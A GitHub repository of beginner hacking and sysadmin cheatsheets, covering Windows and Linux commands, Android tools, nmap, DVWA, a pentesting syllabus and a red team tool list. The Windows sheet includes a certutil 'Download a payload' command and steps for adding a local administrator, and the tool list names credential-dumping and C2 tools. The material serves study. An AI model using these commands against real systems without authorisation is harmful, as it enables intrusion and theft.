├── README.md ├── windows └── commands-1.md ├── android ├── scrcpy.md ├── taking-supreme-access-android.md ├── decompilers.md └── adb.md ├── syllabus └── pentesting.md ├── interface-based-learning ├── dvwa.md ├── rtt.md ├── osi-model-day2.md ├── python-projects.md ├── nmap-day4.md ├── nmap-day3.md └── an-intro-to-hacking.py ├── linux └── top50s.md └── web └── html-cheatsheet.md /README.md: -------------------------------------------------------------------------------- 1 | # LearnSheet : `Cheatsheets and clear roadmaps, empowering your learning journey with essential information at your fingertips.` 2 | ![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/d6e072b6-c8d0-445a-bd4d-a70e2d4d54a6) 3 | 4 | > - **Team** 5 | > TechnologyMedia org 6 | -------------------------------------------------------------------------------- /windows/commands-1.md: -------------------------------------------------------------------------------- 1 | # list local users 2 | ``` 3 | net user 4 | ``` 5 | # Get current user info 6 | ``` 7 | whoami 8 | whoami /groups 9 | whoami /priv 10 | ``` 11 | # Add users (local) 12 | ``` 13 | net user /add 14 | net localgroup Administartors /add 15 | ``` 16 | # See Running Processes 17 | ``` 18 | tasklist 19 | wmic process 20 | ``` 21 | # Kill a process 22 | ``` 23 | taskkill /PID /F 24 | ``` 25 | # See Running Services 26 | ``` 27 | net start 28 | sc query 29 | wmic service get 30 | ``` 31 | # Capture Packets 32 | ``` 33 | netsh trace start persistent=yes capture=yes tracefile=.etl 34 | netsh trace stop 35 | ``` 36 | # Download a payload 37 | ``` 38 | certutil -urlcache -split -f "https://.zip" .zip 39 | ``` 40 | # Check for Open Ports (Powershell) 41 | 42 | ``` 43 | tnc \\computer.domain -Port 80 44 | tnc 10.0.0.1 -Port 443 45 | ``` 46 | ``# 47 | -------------------------------------------------------------------------------- /android/scrcpy.md: -------------------------------------------------------------------------------- 1 | 2 |

Scrcpy Cheatsheet

3 | 4 |

Installation

5 | 6 |
    7 |
  • Download scrcpy from the official GitHub repository:
    • 8 | git clone https://github.com/Genymobile/scrcpy.git 9 |
  • Build and install scrcpy:
    • 10 | cd scrcpy
    ./gradlew assembleDebug     11 |
  • Connect your Android device to your computer using USB debugging.
    • 12 |
13 | 14 |

Usage

15 | 16 |
    17 |
  • Launch scrcpy:
    • 18 | ./scrcpy 19 |
  • Display device in a specific resolution:
    • 20 | ./scrcpy -m 1280 21 |
  • Control device using keyboard and mouse:
    • 22 |
      23 |
    • Use mouse to click, drag, and scroll.
      • 24 |
    • Use keyboard shortcuts:
      • 25 |
        26 |
      • Ctrl + Left Click: Trigger a right-click event.
        • 27 |
      • Ctrl + Shift + H: Hide the device screen.
        • 28 |
      • Ctrl + G: Resize the device screen to its original size.
        • 29 |
      30 |
    31 |
  • Record screen and save it as a video:
    • 32 | ./scrcpy --record file.mp4 33 |
  • Adjust the bitrate for screen recording:
    • 34 | ./scrcpy --record file.mp4 --bit-rate 4000000 35 |
36 | -------------------------------------------------------------------------------- /syllabus/pentesting.md: -------------------------------------------------------------------------------- 1 | - [ ] Introduction to Hacking 2 | - [ ] Types of Hackers and Hackings 3 | - [ ] Advantages, Disadvantages and Purpose of Hacking 4 | - [ ] Tools and Terminologies You Should Know 5 | - [ ] Prerequisites 6 | - [ ] The Process and Mindset 7 | - [ ] Reconnaissance 8 | - [ ] Basic Footprinting 9 | - [ ] Domain Name Information 10 | - [ ] Finding IP Address 11 | - [ ] Finding Hosting Company 12 | - [ ] IP Address Ranges 13 | - [ ] History of the website 14 | - [ ] Basic Fingerprinting 15 | - [ ] Port Scanning 16 | - [ ] Ping Sweep 17 | - [ ] DNS Enumeration 18 | - [ ] Basic Sniffing 19 | - [ ] Types of Sniffing 20 | - [ ] Hardware Protocol Analyzers 21 | - [ ] Lawful Interception 22 | - [ ] Working with Sniffing Tools 23 | - [ ] ARP Spoofing 24 | - [ ] Man In The Middle 25 | - [ ] Practicing DNS Poisoning 26 | - [ ] Basic Exploitation 27 | - [ ] Basic Enumeration 28 | - [ ] Working with Metasploit 29 | - [ ] Basic Trojan 30 | - [ ] TCP/IP Hijacking 31 | - [ ] Social Engineering 32 | - [ ] How to gift a virus? 33 | - [ ] Basic Password Hacking 34 | - [ ] Dictionary Attack 35 | - [ ] Hybrid Dictionary Attack 36 | - [ ] Brute-Force Attack 37 | - [ ] Rainbow Tables 38 | - [ ] Basic Wireless Hijacking 39 | - [ ] Exploring Kismet 40 | - [ ] Working with NetStumbler 41 | - [ ] Wired Equivalent Privacy 42 | - [ ] Wireless Dos Attack 43 | - [ ] Working with Botnets 44 | - [ ] Types of DDoS 45 | - [ ] XSS 46 | - [ ] SQL injection 47 | - [ ] Knowing the basics of Penetration Testing 48 | -------------------------------------------------------------------------------- /interface-based-learning/dvwa.md: -------------------------------------------------------------------------------- 1 | # Introduction to DVWA (Damn Vulnerable Web Application) Framework 2 | 3 | ## Step-by-Step Guide: 4 | 5 | 1. Installation 6 | - Download the latest version of DVWA . 7 | ![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/d4b3a649-1af8-4658-b859-82c439db899c) 8 | 9 | - Set up a web server environment (e.g., XAMPP or WAMP) on your computer. 10 | ![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/f8bb3df3-dacf-40cc-86eb-ee52a09f4474) 11 | 12 | - Extract the DVWA folder into the web server's document root directory. 13 | ![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/595c7ed9-1335-45a2-847e-8cadc2e3b71f) 14 | 15 | - Rename "config/config.inc.php.dist" to "config/config.inc.php." 16 | - Configure the necessary settings (e.g., database credentials) in the "config/config.inc.php" file. Change username and password according to your's... 17 | - Start your web server and access the DVWA URL in your browser. 18 | 19 | 2. Initial Setup 20 | - Click "Create / Reset Database" to initialize the DVWA database. 21 | ![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/1ddbb2c6-f75a-407b-945b-64cb281a790f) 22 | 23 | - Log in using the default username "admin" and password "password." 24 | ![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/f3e602df-18c7-4679-9c70-94a2508f60a0) 25 | 26 | - You'll be redirected to the main DVWA dashboard. 27 | ![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/a5e3ae64-5cc7-484e-a401-eddc036fef5a) 28 | 29 | 30 | 3. Understanding the Interface 31 | ![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/2bbbace0-5f6e-43d3-8c0e-d9f37a039c9b) 32 | 33 | - Vulnerability Selection: Choose a specific vulnerability or security level to work on. 34 | - Main Menu: Access different vulnerability categories (e.g., SQL injection, XSS, Command Execution). 35 | - Security Level: Select the desired difficulty level (low to high). 36 | - Progress Bar: Track your completion progress. 37 | -------------------------------------------------------------------------------- /interface-based-learning/rtt.md: -------------------------------------------------------------------------------- 1 |

RED TEAM TOOLKIT

2 | Privilege Escalation 3 | 4 |

Privilege Escalation

5 |
    6 |
  • Blood Hunt
    • 7 |
  • BeRoot
    • 8 |
9 | 10 |

Phishing

11 | Phishing 12 |
    13 |
  • Gophish
    • 14 |
  • King Phisher
    • 15 |
  • Evil URL
    • 16 |
17 | 18 |

Command and Control

19 | Command and Control 20 |
    21 |
  • EmpireProject
    • 22 |
  • Pupy
    • 23 |
  • Cobalt Strike
    • 24 |
25 | 26 |

OSINT (Open Source Intelligence Tool)

27 | OSINT 28 |
    29 |
  • Maltego
    • 30 |
  • Spiderfoot
    • 31 |
  • OSINT framework
    • 32 |
33 | 34 |

Reconnaissance

35 | Reconnaissance 36 |
    37 |
  • Nmap
    • 38 |
  • Sqlmap
    • 39 |
  • Shodan
    • 40 |
  • crt.sh
    • 41 |
  • OpenVAS
    • 42 |
  • RustScan
    • 43 |
  • Nikto
    • 44 |
  • Amass
    • 45 |
46 | 47 |

Exfiltration

48 | Exfiltration 49 |
    50 |
  • SharpExfilterate
    • 51 |
  • DNSExfilterator
    • 52 |
  • Egress-Assess
    • 53 |
54 | 55 |

Credential Dumping

56 | Credential Dumping 57 |
    58 |
  • Mimikatz
    • 59 |
  • Lazagne
    • 60 |
  • Rypykatz
    • 61 |
  • Dumpert
    • 62 |
  • Forkatz
    • 63 |
  • nanodump
    • 64 |
65 | -------------------------------------------------------------------------------- /interface-based-learning/osi-model-day2.md: -------------------------------------------------------------------------------- 1 |

TechnologyMedia.org

2 | 3 |

TCP/IP MODEL Layers

4 |
    5 |
  1. Application ----------> HTTP, Telnet, FTP, SMTP, DNS, SNMP
    2. 6 |
  2. Transport ------------> UDP, TCP
    3. 7 |
  3. Network/Internet -----> IP, ICMP, ARP
    4. 8 |
  4. Network Interface ----> Ethernet, Frame Relay
    5. 9 |
10 |

TechnologyMedia.org

11 | 12 |

OSI MODEL

13 |
14 |

The OSI model describes the function of a networking system while TCP/IP is being used to interconnect network device(s) on the internet.

15 |
16 | 17 | 18 |

Layers

19 |
    20 |
  1. Application --> HTTP, FTP, SMTP, NFS, Telnet, etc
    2. 21 |
  2. Presentation -> JPG, PNG, GIF, ASCII, CSS, HTML
    3. 22 |
  3. Session ------> RPS, TLS, SCP
    4. 23 |
  4. Transport ----> TCP[connection-oriented], UDP
    5. 24 |
  5. Network ------> IPv4, IPv6, ICMP, ARP
    6. 25 |
  6. Data link ----> MAC, ATM, IIDCL, Frame Relay
    7. 26 |
  7. Physical -----> Ethernet, USB, DSL, ISDN
    8. 27 |
28 | 29 |
    30 |
  • DNS -> turns domain names into IP address. (Domain Name System)
    • 31 |
  • DHCP -> Dynamically assign IP address to any device. (Dynamic Host Control Protocol {Temporary IP})
    • 32 |
  • ARP -> is used to associate IP address to MAC address (Address Resolution Protocol {IP to MAC})
    • 33 |
  • NAT -> is used to facilitate connection between an external system and an internal system with a private IP address. (Network Address Translation)
    • 34 |
  • VPN -> provides an encrypted server and hides your IP address.
    • 35 |
  • Firewall -> a network security system
    • 36 |
  • Router -> need to connect two or more different networks with each other.
    • 37 |
  • Switch -> used to connect two or more hosts within the same network or targeted domain
    • 38 |
  • Hub -> almost the same as a Switch, but it sends data to all connected ports
    • 39 |
40 | -------------------------------------------------------------------------------- /linux/top50s.md: -------------------------------------------------------------------------------- 1 | # Top 50 Linux Commands you must know as a Regular User 2 | ![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/093b0445-7eae-4b73-8c60-e8864a250360) 3 | 4 | 1. `ls` - view contents of directory (list) 5 | 2. `pwd` - path of the current directory 6 | 3. `cd` - change directory 7 | 4. `mkdir` - make new directory 8 | 5. `mv` - move files / rename files 9 | 6. `cp` - copy files 10 | 7. `rm` - remove files 11 | 8. `touch` - create blank new file 12 | 9. `rmdir` - delete directory 13 | 10. `cat` - list content of file to terminal 14 | 11. `clear` - clear terminal window 15 | 12. `echo` - move data into a file 16 | 13. `less` - Read text file one screen at a time 17 | 14. `man` - show manual of Linux commands 18 | 15. `sudo` - enables you to perform tasks that require administrative or root permissions 19 | 16. `top` - task manager in terminal 20 | 17. `tar` - used to archive multiple files into a tarball 21 | 18. `grep` - used to searching words in specific files 22 | 19. `head` - view first lines of any text file 23 | 20. `tail` - view last lines of any text file 24 | 21. `diff` - compares the contents of two files line by line 25 | 22. `kill` - used for killing unresponsive program 26 | 23. `jobs` - display all current jobs along with their statuses 27 | 24. `sort` - is a command line utility for sorting lines of text files 28 | 25. `df` - info about system disk 29 | 26. `du` - check how much space a file or directory takes 30 | 27. `zip` - to compress your files into a zip archive 31 | 28. `unzip` - to extract the zipped files from a zip archive 32 | 29. `ssh` - a secure encrypted connection between two hosts over and insecure network 33 | 30. `cal` - shows calendar 34 | 31. `apt` - command line tool for interaction with packaging system 35 | 32. `alias` - custom shortcuts used to represent a command 36 | 33. `w` - current user info 37 | 34. `whereis` - used to locate the binary, source, manual page files 38 | 35. `whatis` - used to get one-line man page description 39 | 36. `useradd` - used to create a new user 40 | 37. `passwd` - used to changing password of current user 41 | 38. `whoami` - print current user 42 | 39. `uptime` - print current time when machine starts 43 | 40. `free` - print free disk space info 44 | 41. `history` - print used commands history 45 | 42. `uname` - print detailed information about your Linux system 46 | 43. `ping` - to check connectivity status to a server 47 | 44. `chmod` - to change permissions of files and directories 48 | 45. `chown` - to change ownership of files and directories 49 | 46. `find` - using find searches for files and directories 50 | 47. `locate` - used to locate a file, just like the search command in Windows 51 | 48. `ifconfig` - print IP address stuff 52 | 49. `ipa` - similar to ifconfig but shortest print 53 | 50. `finger` - gives you a short dump of info about a user 54 | -------------------------------------------------------------------------------- /interface-based-learning/python-projects.md: -------------------------------------------------------------------------------- 1 | # Get Started with: Python Cybersecurity Projects 2 | > These Python projects are aimed at enhancing cybersecurity measures and can serve as valuable learning experiences for developers interested in this domain. 3 | 4 | ### 1. Network Scanner 5 | > A tool to scan networks, identify open ports, services, and vulnerabilities. Utilizes libraries like Scapy or Nmap. 6 | 7 | ### 2. Password Manager 8 | > Develops a secure password manager emphasizing encryption and security best practices for storing and managing passwords. 9 | 10 | ### 3. Intrusion Detection System (IDS) 11 | Builds a system to monitor network traffic, alerting on suspicious or malicious activities using techniques like Snort rules. 12 | 13 | ### 4. Vulnerability Scanner 14 | Designs a tool to identify security weaknesses in web applications or network services, integrating tools like Nikto, OWASP ZAP, or Nessus. 15 | 16 | ### 5. Honeypot 17 | Sets up a system that simulates vulnerable services to attract attackers, providing insights into common attack patterns. 18 | 19 | ### 6. Network Packet Sniffer 20 | Creates a tool to capture and analyze network packets, identifying potential security threats. 21 | 22 | ### 7. File Encryption/Decryption Tool 23 | Builds a tool using strong cryptographic algorithms like AES for encrypting and decrypting files with secure key management. 24 | 25 | ### 8. Malware Analysis Tool 26 | Develops a tool to analyze and reverse-engineer malware, understanding behavior and identifying indicators of compromise (IoCs). 27 | 28 | ### 9. Phishing Detection System 29 | Utilizes machine learning or deep learning techniques to detect phishing emails or websites. 30 | 31 | ### 10. Secure Chat Application 32 | Develops a chat app with end-to-end encryption, ensuring user privacy and data security. 33 | 34 | ### 11. Firewall Rule Analyzer 35 | Creates a tool to analyze and suggest improvements for firewall rules, enhancing network security. 36 | 37 | ### 12. Security Information and Event Management (SIEM) System 38 | Develops a system to collect, analyze, and correlate security event logs for threat detection and incident response. 39 | 40 | ### 13. Security Awareness Training Platform 41 | A platform for educating users on cybersecurity best practices, simulating various security scenarios for training. 42 | 43 | ### 14. Two-Factor Authentication (2FA) System 44 | Builds a system providing an additional layer of security for user accounts or applications. 45 | 46 | ### 15. Security Dashboard 47 | Designs a dashboard that aggregates and visualizes security-related data from various sources, providing insights into organizational security posture. 48 | 49 | ### 16. USB Device Control Tool 50 | Develops a tool to control and monitor USB devices connected to a computer, preventing unauthorized data transfers. 51 | 52 | ### 17. Threat Intelligence Feed Aggregator 53 | Creates a system that aggregates threat intelligence feeds, providing real-time information on threats and vulnerabilities. 54 | 55 | ### 18. Security Policy Compliance Checker 56 | Builds a tool to check if an organization's systems and policies comply with security standards and regulations. 57 | 58 | Remember, prioritize security, follow best practices for coding, and utilize appropriate encryption and authentication methods in these projects. 59 | -------------------------------------------------------------------------------- /android/taking-supreme-access-android.md: -------------------------------------------------------------------------------- 1 | Today, we will discuss the topic of "How a hacker gains supreme access to your personalized smartphone?" 2 | 3 | > "Android was built to be very secure." 4 | > ~ Sundar Pichai 5 | 6 | ![Android with malware](https://github.com/offsecnepal/LearnSheet/assets/111997815/dce5034a-584b-43eb-98af-93c817fab32d) 7 | 8 | There are various methods that hackers employ to infiltrate Android systems or exploit common vulnerabilities. The most prevalent method is phishing. In the initial stages, an attacker pretends to be an authentic and recognized service or product to manipulate the victim. Once the victim opens and executes the tempting service, it operates as directed by the attacker, providing the attacker with the access they seek. 9 | 10 | We've listed some common keywords that attackers use to deceive victims before executing the payload: 11 | 12 | - Event wishing (Camera & IP) 13 | - Fake Bank Link (Credentials, Account Information, OTP) 14 | - Lottery spinner (Adware) 15 | - User Interest Related Content Link (APK download -> Factory Reset, SMS spy, Gallery spy, clipboard hijacking) 16 | - Fake selfie camera (Location, Camera & IP) 17 | - Live YouTube Link (Camera & IP) 18 | - Meeting Link (Location, Camera & IP) 19 | - Fake Unlocked APK (APK download -> Adware) 20 | - System Update APK (APK download -> Factory Reset, SMS spy, Gallery spy, clipboard hijacking) 21 | - And more 22 | 23 | These are recent commonly used application packages that are easily accessible, even to someone who has just begun searching "how to hack Android?": 24 | 25 | - Smseye app.apk 26 | - xphantom apk 27 | - HXPDucky.apk 28 | - Helloboy.apk 29 | - System Update.apk 30 | - Gallery eye.apk 31 | - Location eye.apk 32 | 33 | Since these applications conceal themselves from the user, it is challenging to determine whether an Android device has been compromised. A hacked Android device behaves similarly to a normal, older Android mobile. However, there are some signs you may notice when a malicious application is installed on an Android device: 34 | 35 | - Pop-ups 36 | - Unknown SMS or calls 37 | - High data usage 38 | - Excessive battery drain 39 | - Overheating 40 | - Reduced performance 41 | - Unusual website behavior 42 | - Unrecognized apps 43 | 44 | If you find yourself in such a situation, we recommend taking the following steps immediately to protect yourself from exploitation: 45 | 46 | - Delete unrecognized apps 47 | - Run anti-malware software 48 | - Perform a system restore 49 | - Reset passwords 50 | - Inform your contacts 51 | - Notify your service provider 52 | - Report the incident to local law enforcement 53 | 54 | # Recent Android Spyware: SpyNote 55 | 56 | ![Spynote Android Trojan](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRDrb0x9EAmzx0XTLVrEsK_rk0VtLmu96T1HtOBwR02i6hppBsmf0KLoVHLVOj14DgPAnqdx1KV-sbHnVlWcMif96mdXpEnywNHAvoRbjTmkSiqVxX8NorXJzjf3WtJgwlLVPzW9OQ2Tnx-MMGo2pcwSreXwT_FFMzKyAHMzu3eC9JQks5yYf2gbnZUZMU/s728-rw-ft-e30/android.jpg) 57 | 58 | According to F-Secure researchers, SpyNote is primarily distributed through SMS phishing campaigns. It tricks potential victims into installing the app by enticing them to click on an embedded link. For more information, you can [read more](https://timesofindia.indiatimes.com/gadgets-news/this-android-banking-trojan-can-record-audio-phone-calls-to-steal-data/articleshow/104484863.cms). 59 | -------------------------------------------------------------------------------- /interface-based-learning/nmap-day4.md: -------------------------------------------------------------------------------- 1 |

TechnologyMedia.org

2 | 3 |

Download Nmap

4 |

image

5 |

TechnologyMedia.org

6 | 7 |

Full Open Scan (sT)

8 |
9 |

An sT scan is a type of network scan performed using Nmap, a popular network exploration tool. The sT scan, also known as a full open scan, involves attempting to establish a full TCP connection with the target system's ports. This scan method sends a TCP SYN packet to the target and waits for a SYN/ACK response, indicating an open port. By analyzing the responses, the sT scan reveals the status of ports, identifying whether they are open, closed, or filtered. However, unlike stealth scans, sT scans are more likely to be detected by intrusion detection systems (IDS) or firewalls due to the full TCP connection establishment.

10 |
11 |

image

12 | 13 |

TechnologyMedia.org

14 |

Stealth Scan

15 |
16 |

A stealth scan, also known as a SYN scan, is a network scanning technique used to gather information about open ports on a target system while minimizing the chances of detection. Instead of completing the TCP handshake, a stealth scan sends SYN packets to the target's ports. By analyzing the responses received, the scanner can determine if a port is open, closed, or filtered. Stealth scans are preferred in situations where stealthiness and evasion of intrusion detection systems (IDS) or firewalls are desired.

17 |
18 |

image

19 |

TechnologyMedia.org

20 | 21 |

Sv

22 |
23 |

An sV scan is a network scanning technique performed using Nmap, a versatile network exploration tool. The sV scan focuses on service version detection by interrogating the target system's open ports. It aims to identify the specific services running on those ports and gather information about their versions. By analyzing the responses received from the target, the sV scan provides insights into the software and versions used by the services, aiding in further analysis and potential vulnerability assessment. This scan is particularly useful for understanding the network landscape and identifying potential security risks associated with outdated or vulnerable service versions.

24 |
25 |

image

26 |

TechnologyMedia.org

27 | 28 |

view NSE (nmap Script Engine) scripts for windows user

29 |

image

30 |

TechnologyMedia.org

31 | 32 |

Use script

33 |

image

34 | -------------------------------------------------------------------------------- /android/decompilers.md: -------------------------------------------------------------------------------- 1 | # APK decompilers 2 | 3 | 1. **jadx-gui**: 4 | - First famous GUI Java decompiler, you could use it to investigate the Java code from the APK once you have obtained it. 5 | - Built in Java (multi-platform) and at this moment, it's the recommended one. 6 | - Just download the latest version and execute it from the bin folder: 7 | ``` 8 | jadx-gui 9 | ``` 10 | - Using the GUI you can perform text search, go to the functions definitions (CTRL + left click on the function), and cross-refs (right click --> Find Usage). 11 | - If you only want the Java code but without using a GUI, a very easy way is to use the jadx CLI tool: 12 | ``` 13 | jadx app.apk 14 | ``` 15 | - Some interesting options of jadx (GUI and CLI versions) are: 16 | ``` 17 | -d 18 | --no-res #No resources 19 | --no-src #No source code 20 | --no-imports #Always write the entire package name (very useful to know where the function that you might want to hook is) 21 | ``` 22 | 23 | 2. **GDA**: 24 | - A powerful and fast reverse analysis platform that supports basic decompiling operations and many excellent functions like Malicious behavior detection, Privacy leaking detection, Vulnerability detection, Path solving, Packer identification, Variable tracking analysis, Deobfuscation, Python & Java scripts, Device memory extraction, Data decryption and encryption, etc. 25 | - Only available for Windows. 26 | 27 | 3. **Bytecode-Viewer**: 28 | - Another interesting tool for static analysis. 29 | - It allows you to decompile the APK using several decompilers at the same time. For example, you can see 2 different Java decompilers and one Smali decompiler. It also allows you to modify the code and export it. 30 | - One limitation of Bytecode-Viewer is that it doesn't have references or cross-references. 31 | 32 | 4. **Enjarify**: 33 | - A tool for translating Dalvik bytecode to equivalent Java bytecode, allowing Java analysis tools to analyze Android applications. 34 | 35 | 5. **Dex2jar**: 36 | - An older tool that translates Dalvik to Java bytecode. 37 | - It works well most of the time but may fail or produce incorrect results in some cases. 38 | - Enjarify is designed to handle more cases compared to Dex2jar, including obscure features or edge cases. 39 | 40 | 6. **CFR**: 41 | - A decompiler that can handle modern Java features (e.g., lambda expressions, try-with-resources, and method references). 42 | - Written entirely in Java 6, so it works anywhere. 43 | - It can also decompile class files from other JVM languages back into Java. 44 | - To use CFR, you can use the following JAR file: 45 | ``` 46 | java -jar ./cfr.jar "$JARFILE" --outputdir "$OUTDIR" 47 | ``` 48 | For larger JAR files, you may need to increase the memory allocation pool of the JVM. 49 | 50 | 7. **Fernflower**: 51 | - Part of the IntelliJ IDEA project. 52 | - Fernflower is an analytical decompiler that outputs the generated .java files in a JAR file. 53 | - To build and use Fernflower, you need to follow specific instructions. Please refer to the project's GitHub page for details. 54 | 55 | 8. **Krakatau**: 56 | - A decompiler written in Python. 57 | - It requires external class definitions (libraries) and can handle standard library classes up to Java version 8. 58 | - You can use Krakatau to decompile JAR files by providing the necessary dependencies using the `-path` flag. 59 | - Please refer to Krakatau's GitHub page for detailed instructions on usage. 60 | 61 | 9. **Procyon**: 62 | - Once installed, you can use Procyon to decompile JAR files straightforwardly. 63 | - Usage example: 64 | ``` 65 | procyon -jar "$JARFILE" -o "$OUTDIR" 66 | ``` 67 | 68 | References: 69 | - [jadx-gui GitHub](https://github.com/skylot/jadx) 70 | - [GDA GitHub](https://github.com/charles2gan/GDA-android-reversing-Tool) 71 | - [Bytecode-Viewer GitHub](https://github.com/Konloch/bytecode-viewer) 72 | - [Enjarify GitHub](https://github.com/google/enjarify) 73 | - [CFR GitHub](https://github.com/leibnitz27/cfr) 74 | - [Fernflower GitHub](https://github.com/JetBrains/intellij-community/tree/master/plugins/java-decompiler/engine) 75 | - [Krakatau GitHub](https://github.com/Storyyeller/Krakatau) 76 | - [Procyon GitHub](https://bitbucket.org/mstrobel/procyon) 77 | -------------------------------------------------------------------------------- /interface-based-learning/nmap-day3.md: -------------------------------------------------------------------------------- 1 |

TechnologyMedia.org

2 | 3 |

Network-Based Vulnerability Assessment and Nmap Guide for Servers

4 |

Step 1: Install Nmap

5 |

Ensure that Nmap is installed on your system. You can download the latest version from the official Nmap website or use package managers specific to your operating system.

6 |

Step 2: Identify the Target Server

7 |

Determine the IP address or hostname of the server you want to assess for vulnerabilities. This information will be used in the subsequent steps.

8 |

Step 3: Scan for Open Ports

9 |

Open a terminal or command prompt and run the following Nmap command: 10 | nmap <target IP or hostname>

11 |
12 |

This command will scan the target server for open ports and display the services running on each port.

13 |
14 |

TechnologyMedia.org

15 | 16 |

Step 4: Perform Service Version Detection

17 |
18 |

To identify the version and type of services running on the open ports, run the following Nmap command: 19 | nmap -sV <target IP or hostname> 20 | Nmap will analyze the services and attempt to determine their versions. This information is valuable for identifying vulnerabilities associated with specific service versions.

21 |
22 |

Step 5: Conduct Operating System Fingerprinting

23 |

To determine the type and version of the operating system running on the target server, use the following Nmap command: 24 | nmap -O <target IP or hostname>

25 |
26 |

Nmap will perform operating system fingerprinting based on network responses, providing insights into potential vulnerabilities related to the identified operating system.

27 |
28 |

TechnologyMedia.org

29 | 30 |

Step 6: Utilize Vulnerability Scanning Scripts

31 |

Nmap's NSE (Nmap Scripting Engine) provides numerous scripts that can be used for vulnerability scanning. Run specific scripts against the target server using the following command: 32 | nmap --script=<script name> <target IP or hostname> 33 | Replace <script name> with the name of the desired script. Examples include vulners for vulnerability scanning, http-vuln-* for web application vulnerabilities, and ssl-heartbleed for detecting the Heartbleed vulnerability.

34 |

Step 7: Customize Timing and Stealth Options

35 |

Nmap offers different timing and stealth options to adjust the scan's aggressiveness and reduce the likelihood of detection. Experiment with options like -T<timing level> (e.g., -T4 for aggressive scans) and --scan-delay <time> to fine-tune the scanning process.

36 |

Step 8: Analyze Nmap Output

37 |

Carefully review the Nmap output after the scan is complete. Analyze open ports, service versions, and identified vulnerabilities. Pay special attention to critical vulnerabilities that pose a high risk to server security.

38 |

Step 9: Take Remedial Action

39 |

Based on the vulnerabilities identified, take appropriate measures to address them. This may involve applying security patches, updating software versions, or reconfiguring server settings to mitigate the risks.

40 |

Step 10: Schedule Regular Scans

41 |

Perform network-based vulnerability assessments on a regular basis to ensure ongoing server security. Schedule Nmap scans periodically, especially after making changes to server configurations or applying updates.

42 | -------------------------------------------------------------------------------- /interface-based-learning/an-intro-to-hacking.py: -------------------------------------------------------------------------------- 1 | import os 2 | import pywhatkit 3 | def clear_screen(): 4 | os.system('cls' if os.name == 'nt' else 'clear') 5 | def display_title(): 6 | clear_screen() 7 | print("\033[1;34m=== Introduction to Hacking ===\033[0m") 8 | print("The Hacking Manual welcomes you!") 9 | print("By this tool,you will cover the basics of ethical hacking and cybersecurity.") 10 | print("Let's get started!\nAuthor: Dev. Gautam Kumar@TechnologyMedia") 11 | def display_menu(): 12 | print("\033[1mMenu:\033[0m") 13 | print("1. \033[1;32mIntroduction to Ethical Hacking\033[0m") 14 | print("2. \033[1;33mSetting up Your Hacking Environment\033[0m") 15 | print("3. \033[1;36mReconnaissance and Information Gathering\033[0m") 16 | print("4. \033[1;35mExploitation Techniques\033[0m") 17 | print("5. \033[1;31mPost-Exploitation and Maintaining Access\033[0m") 18 | print("6. \033[1;33mSocial Engineering\033[0m") 19 | print("7. \033[1;36mWeb Application Security\033[0m") 20 | print("8. \033[1;32mCapture the Flag (CTF) Challenges\033[0m") 21 | print("9. \033[1;35mAdditional Resources\033[0m") 22 | print("0. \033[1;31mExit\033[0m") 23 | def select_option(): 24 | choice = input("\nEnter the option number to continue: ") 25 | return choice 26 | def process_option(choice): 27 | if choice == '1': 28 | display_topic("Introduction to Ethical Hacking", 29 | "Ethical hacking is the practice of identifying vulnerabilities and securing computer systems and networks. This guide provides an overview of ethical hacking and its importance in cybersecurity.") 30 | elif choice == '2': 31 | display_topic("Setting up Your Hacking Environment", 32 | "Setting up a hacking environment is crucial for ethical hackers. This guide helps you set up your hacking environment with the necessary tools and software.") 33 | elif choice == '3': 34 | display_topic("Reconnaissance and Information Gathering", 35 | "Reconnaissance involves gathering information about a target to assess its vulnerabilities. This guide covers techniques for reconnaissance and information gathering in ethical hacking.") 36 | elif choice == '4': 37 | display_topic("Exploitation Techniques", 38 | "Exploitation techniques are used to gain unauthorized access to computer systems or networks. This guide explores various exploitation techniques, including network and application-level attacks.") 39 | elif choice == '5': 40 | display_topic("Post-Exploitation and Maintaining Access", 41 | "Post-exploitation involves activities performed after gaining access to a target system. This guide focuses on post-exploitation and maintaining access in ethical hacking scenarios.") 42 | elif choice == '6': 43 | display_topic("Social Engineering", 44 | "Social engineering is the art of manipulating individuals to gain unauthorized access to information or systems. This guide delves into social engineering techniques and their use in ethical hacking.") 45 | elif choice == '7': 46 | display_topic("Web Application Security", 47 | "Web applications often have vulnerabilities that can be exploited by attackers. This guide covers web application security and common vulnerabilities, such as SQL injection and cross-site scripting (XSS).") 48 | elif choice == '8': 49 | display_topic("Capture the Flag (CTF) Challenges", 50 | "Capture the Flag (CTF) challenges are cybersecurity competitions that test participants' hacking skills. This guide introduces CTF challenges and provides resources to practice your hacking abilities.") 51 | elif choice == '9': 52 | display_topic("Additional Resources for getting started with hacking","Additional resources related to hacking!") 53 | elif choice == '0': 54 | clear_screen() 55 | print("Thank you for exploring the world of ethical hacking!") 56 | print("Stay curious, keep learning, and always hack ethically.") 57 | print("Goodbye!") 58 | else: 59 | print("\033[91mInvalid option. Please try again.\033[0m") 60 | def display_topic(title, summary): 61 | clear_screen() 62 | print(f"\033[1;34m=== {title} ===\033[0m") 63 | print(summary) 64 | pywhatkit.playonyt(title) 65 | def run_workshop(): 66 | display_title() 67 | while True: 68 | display_menu() 69 | option = select_option() 70 | if option == '0': 71 | break 72 | process_option(option) 73 | input("\nPress Enter to continue...") 74 | display_title() 75 | run_workshop() 76 | -------------------------------------------------------------------------------- /android/adb.md: -------------------------------------------------------------------------------- 1 | # ADB: `Cheatsheet for Android Debug Bridge` 2 | ![image](https://github.com/TechnologyMediaorg/LearnSheet/assets/111997815/770fe417-3d68-4099-b9cc-40635f9fe3b0) 3 | 4 | ## ADB Server 5 | - `adb kill-server` 6 | - `adb start-server` 7 | 8 | ## ADB Reboot 9 | - `adb reboot` 10 | - `adb reboot recovery` 11 | - `adb reboot-bootloader` 12 | - `adb root` // restarts ADB with root permissions 13 | 14 | ## Shell 15 | - `adb shell` // Open or run commands in a terminal on the host Android device. 16 | 17 | ## Devices 18 | - `adb usb` 19 | - `adb 